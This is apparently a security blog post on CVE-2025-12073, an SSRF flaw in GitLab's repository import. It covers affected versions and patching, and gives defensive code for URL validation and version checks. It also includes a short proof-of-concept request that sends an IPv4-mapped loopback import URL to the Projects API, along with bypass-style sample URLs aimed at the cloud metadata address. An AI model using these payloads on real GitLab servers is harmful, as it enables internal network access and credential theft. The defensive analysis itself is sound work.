In a patch release covering the 18.6, 18.7 and 18.8 branches, GitLab quietly resolved a dangerous security issue tracked as CVE-2025-12073. This Server-Side Request Forgery (SSRF) vulnerability affected GitLab Community Edition (CE) and Enterprise Edition (EE) installations on all 18.x versions before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4. In simple terms, with the right prerequisites, an authenticated attacker could force the server to send requests to internal services by abusing the Git repository import feature.

This blog post takes a close and easy-to-understand look at how the vulnerability works, its impact, how attackers could exploit it, and how to stay safe. This is an exclusive writeup, designed for security professionals, administrators, and anyone running a GitLab instance.

What is CVE-2025-12073?

GitLab's repository import function allows users to bring in projects from remote Git repositories using a URL. To avoid turning GitLab servers into a proxy for abuse, the import URL is validated so that a user cannot import from internal resources (localhost, 127.0.0.1, private-range addresses, or cloud metadata IPs such as 169.254.169.254). The fix for CVE-2025-12073 shows that, under certain circumstances, that validation could be sidestepped.

Impact: An authenticated GitLab user could cause the server to reach out (via SSRF) to internal endpoints, which could lead to data leakage, further internal attack, or even full compromise, depending on what internal resources are exposed.

Affected Versions

- 18.x before 18.6.6
- 18.7 before 18.7.4
- 18.8 before 18.8.4

> Reference: GitLab Security Release Blog

How the Import URL Validation Works

Before fetching anything, GitLab validates the import URL. The validation:

- Disallows URLs pointing to localhost, 127.0.0.1, or internal IPs
- Blocks non-HTTP protocols, like file:// or gopher://

But security researchers found that, in some situations, the validation could be bypassed. The precise bypass technique has not been published; in past SSRF filter bypasses, the tricks included:

- Writing the target address in a form the filter does not recognise but the HTTP client does, such as an IPv4-mapped IPv6 literal ([::ffff:127.0.0.1]) or a hostname that resolves to an internal address
- Manipulating the way host headers or path traversal is processed
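To make the difference concrete, here is an added example (not GitLab's code, and not the bypass used against this CVE, which has not been published): a blocklist filter of the kind described above, beside a hardened check that decides on the address the client would actually connect to. The sample URLs and the FAKE_DNS table are constructed for the demonstration, and the names naive_is_blocked, hardened_is_blocked and fake_resolver are chosen here.

```python
"""Added example: a text-match import-URL blocklist vs. an address-based check.

Not GitLab's code. Standard library only; DNS is replaced by a constructed
resolver so the script runs offline.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = ("http", "https")
NAIVE_BLOCKED_HOSTS = {"localhost", "127.0.0.1", "0.0.0.0", "169.254.169.254"}
NAIVE_BLOCKED_PREFIXES = ("10.", "192.168.", "172.16.")


def naive_is_blocked(url: str) -> bool:
    """Blocklist that compares the hostname text against known-bad values."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return True                      # file://, gopher:// ...
    host = (parts.hostname or "").lower()
    return host in NAIVE_BLOCKED_HOSTS or host.startswith(NAIVE_BLOCKED_PREFIXES)


def _is_internal(addr) -> bool:
    """True for loopback, private, link-local, multicast, reserved or
    unspecified addresses. An IPv4-mapped IPv6 address is unwrapped first,
    so ::ffff:127.0.0.1 is judged as 127.0.0.1."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def hardened_is_blocked(url: str, resolver=None) -> bool:
    """Decide on the address the client would connect to, not on the text.
    Fails closed on anything it cannot parse or resolve."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return True
    host = parts.hostname
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        addrs = [ipaddress.ip_address(host)]        # IP literal, any notation
    except ValueError:                              # a name: resolve it
        if resolver is None:
            return True
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (ValueError, OSError):
            return True
    if not addrs:
        return True
    return any(_is_internal(a) for a in addrs)


def system_resolver(host):
    """Real resolver for production use (not called by the offline demo)."""
    return [ai[4][0] for ai in socket.getaddrinfo(host, None)]


# Constructed DNS data for the demo; not real records.
FAKE_DNS = {
    "git.example.org": ["93.184.216.34"],     # a public address
    "intranet.corp.example": ["10.1.2.3"],    # name pointing inside the network
}


def fake_resolver(host):
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise OSError("NXDOMAIN") from None     # behaves like socket.gaierror


# Constructed sample import URLs.
SAMPLES = [
    "http://[::ffff:127.0.0.1]:80/private-api",   # IPv4-mapped loopback
    "http://[::1]/",                              # IPv6 loopback
    "http://169.254.169.254/latest/meta-data/",   # cloud metadata
    "http://intranet.corp.example/repo.git",      # internal via DNS
    "http://127.1/",                              # short-form loopback
    "file:///etc/passwd",                         # wrong scheme
    "https://git.example.org/repo.git",           # legitimate
]


def compare(urls=SAMPLES, resolver=fake_resolver):
    """Return {url: (naive_blocked, hardened_blocked)} for each sample."""
    return {u: (naive_is_blocked(u), hardened_is_blocked(u, resolver)) for u in urls}


if __name__ == "__main__":
    for url, (naive, hard) in compare().items():
        print(f"{url:45} naive={'BLOCK' if naive else 'allow':5} hardened={'BLOCK' if hard else 'allow'}")
```

Run it as a script to see the side-by-side table. Two caveats are worth carrying into a real validator. First, 127.1 is rejected here only because the stub resolver does not know it; the system resolver (and libcurl) expand it to 127.0.0.1, which is why the hardened check resolves names with socket.getaddrinfo rather than trusting the text. Second, resolving at validation time and fetching later leaves a DNS-rebinding window, so the component that performs the fetch should connect to the address that was validated instead of resolving the name again.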

A successful SSRF via project import could look like GitLab being forced to fetch a sensitive internal URL on behalf of the attacker. For example, reading data from a cloud metadata endpoint: http://169.254.169.254/latest/meta-data/.

Below is a simplified, step-by-step sketch of how the attack might look, for educational purposes only:

import requests

# The attacker authenticates with their own personal access token;
# GitLab's REST API reads it from the PRIVATE-TOKEN header.
GITLAB = "https://gitlab.local"
TOKEN = "<personal-access-token>"  # placeholder

session = requests.Session()
session.headers["PRIVATE-TOKEN"] = TOKEN

# Attacker crafts a tricky repository import URL that avoids input filters.
# Here the loopback address is written as an IPv4-mapped IPv6 literal, a
# classic way past a filter that only matches the text "127.0.0.1"; the
# actual bypass for this CVE has not been published.
evil_import_url = "http://[::ffff:127.0.0.1]:80/private-api"

# Prepare the project creation request with the crafted SSRF URL
data = {
    "import_url": evil_import_url,
    "name": "ssrf-test-project",
}

# POST to the Projects API (authenticated); GitLab then fetches import_url
response = session.post(f"{GITLAB}/api/v4/projects", json=data)

# If the server allows and fetches the URL, the SSRF is successful, and the
# attacker can observe results or error messages (for example via the
# project's import status)
print(response.status_code)
print(response.text)

*Note: The above is a simplified demonstration! The real exploit may use more complex encodings or abuse specific GitLab behaviors.*

Real-World Risks

- Cloud Metadata Leakage: Attackers could request URLs like http://169.254.169.254/ to harvest cloud authentication tokens (AWS, GCP, Azure, DigitalOcean).
- Access to Internal APIs: Some companies expose unprotected APIs to their internal network. SSRF could be a way in.
- Pivoting: With SSRF, attackers can escalate, move laterally, trigger additional vulnerabilities ('attack chains').

Mitigation

- Upgrade to 18.6.6, 18.7.4, 18.8.4 or later.
- Apply security updates immediately if you allow project imports, especially for installations exposed to users you do not fully trust.
- Defence in depth: review the outbound request settings in the Admin Area so that requests to the local network are not allowed unless you need them, and on cloud hosts require token-based metadata access (IMDSv2 on AWS) so that a bare GET to 169.254.169.254 returns nothing useful.
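A quick way to tell whether an instance needs the upgrade, as an added example that is not GitLab's own tooling: the check below compares a version string against the affected ranges named in this post and, optionally, reads the running version from GitLab's documented GET /api/v4/version endpoint (which needs a personal access token). The version strings in the demo are constructed; the function names are chosen here.

```python
"""Added example: is a GitLab version in the CVE-2025-12073 affected ranges?

Not GitLab's code. The fixed versions are the ones this post names; the
API helper uses the documented GET /api/v4/version endpoint.
"""
import json
import re
import urllib.request

# Branch minor -> first fixed release on that branch (from this post).
FIXED_IN = {6: (18, 6, 6), 7: (18, 7, 4), 8: (18, 8, 4)}


def parse_version(text: str) -> tuple:
    """Accept '18.7.2', 'v18.7.2' or '18.7.2-ee' and return (18, 7, 2)."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised GitLab version: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(text: str) -> bool:
    """True when the version falls inside an affected range listed above."""
    version = parse_version(text)
    major, minor, _ = version
    if major != 18:
        return False                          # only 18.x is listed as affected
    if minor <= 6:
        return version < FIXED_IN[6]          # 18.0 .. 18.6.5
    if minor in FIXED_IN:
        return version < FIXED_IN[minor]      # 18.7.x and 18.8.x branches
    return False                              # 18.9 and later shipped fixed


def fetch_version(base_url: str, token: str, timeout: float = 10) -> str:
    """Read the running version from the documented /api/v4/version endpoint."""
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/api/v4/version",
        headers={"PRIVATE-TOKEN": token},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)["version"]


def audit(versions):
    """Return {version_string: vulnerable?} for a list of version strings."""
    return {v: is_vulnerable(v) for v in versions}


if __name__ == "__main__":
    # Constructed inputs for the demo.
    for v, bad in audit(["18.3.1", "18.6.5-ee", "18.6.6", "18.7.2-ee",
                         "18.7.4", "18.8.3", "18.8.4", "v18.9.0"]).items():
        print(f"{v:12} {'VULNERABLE: upgrade' if bad else 'ok'}")
```

On an Omnibus install you can also read the version with `sudo gitlab-rake gitlab:env:info` instead of calling the API. The check only reflects the ranges this post lists; the GitLab release notes remain the authority for any branch not mentioned here.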

Reference:
- GitLab Release Notes (Official)
- NIST NVD Entry CVE-2025-12073 *(may be pending full details)*

Conclusion

CVE-2025-12073 is the latest reminder that SSRF remains one of the most critical flaws in modern web applications, especially those with automation and import features. If you run GitLab—even on an intranet or for personal use—patch promptly. SSRF is hard to detect and can be devastating if your internal network holds treasures behind “trusted” IPs.

Have questions or want to understand more about securing GitLab? Visit the GitLab Security Portal or read their official SSRF documentation.

Stay safe and keep your systems patched!

*Exclusive report for the security community. Share responsibly.*

Timeline

Published on: 02/11/2026 11:34:46 UTC
Last modified on: 02/11/2026 15:27:26 UTC